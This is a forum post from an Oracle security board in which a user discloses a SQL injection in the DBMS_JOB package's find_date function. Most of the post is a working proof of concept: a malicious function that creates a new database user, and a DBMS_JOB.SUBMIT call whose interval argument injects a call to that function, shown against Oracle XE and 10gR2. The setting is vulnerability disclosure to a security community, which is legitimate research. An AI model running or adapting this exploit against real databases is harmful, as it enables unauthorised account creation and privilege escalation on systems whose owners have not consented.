Auditing an Oracle database for security issues is very important. PeteFinnigan.com provides all of the information and tools that you will need Click here for details of PeteFinnigan.com Limited's detailed Oracle database security audit service Click here for details of PeteFinnigan.com Limited's Oracle Security Training Courses
Cookie Policy:We only use essential cookies on small sections of this website. For details see here.

Welcome, Guest. Please Login.
Nov 17th, 2017, 9:21pm
News: Welcome to Pete Finnigan's Oracle security forum
Home | Help | Search | Members | Login
   Pete Finnigan's Oracle Security Forum
   Database Security
   Database Security
(Moderator: Pete Finnigan)
   DBMS_JOB PACKAGE, find_date FUNCTION sql-injection
« Previous topic | Next topic »
Pages: 1  Reply | Notify of replies | Send Topic | Print
   Author  Topic: DBMS_JOB PACKAGE, find_date FUNCTION sql-injection  (Read 2160 times)
dsu
PeteFinnigan.com Newbie
*



I love YaBB 1G - SP1!

   
View Profile | WWW | Email

Gender: male
Posts: 21
DBMS_JOB PACKAGE, find_date FUNCTION sql-injection
« on: Apr 9th, 2010, 8:03am »
Quote | Modify

Code:

...
   30    CUR := DBMS_SQL.OPEN_CURSOR;
   31  BEGIN
   32  
   33    DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||
   34  
 
 
 
    ' from dual', DBMS_SQL.NATIVE );
...

Find_date is not declared. I use SUBMIT procedure to exploit injection.
 
Code:

...
  134     MYDATE := FIND_DATE(INTERVAL);
  135     IF NOT NO_PARSE THEN
  136  PARSE_JOB(WHAT);
  137     END IF;
  138  
...

1. Create function.
Code:

CREATE OR REPLACE FUNCTION fff return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'create user fff identified by fff';
COMMIT;
RETURN 'sys';
END;
/

 
2. Exploit POC
Code:

DECLARE
 jobNo BINARY_INTEGER;
BEGIN
jobNo:=4242;
dbms_job.submit(jobNo, 'do_job;', TRUNC(SYSDATE+(1/24), 'HH'),'TRUNC(SYSDATE+(30/24/60),''MI'') from dual where chr(115)=sys.fff() --');
END;

 
DB Version: Oracle XE, Oracle 10gR2
Procedure isubmit can be used.
IP Logged
Pages: 1  Reply | Notify of replies | Send Topic | Print

« Previous topic | Next topic »

Powered by YaBB 1 Gold - SP 1.4!
Forum software copyright 2000-2004 Yet another Bulletin Board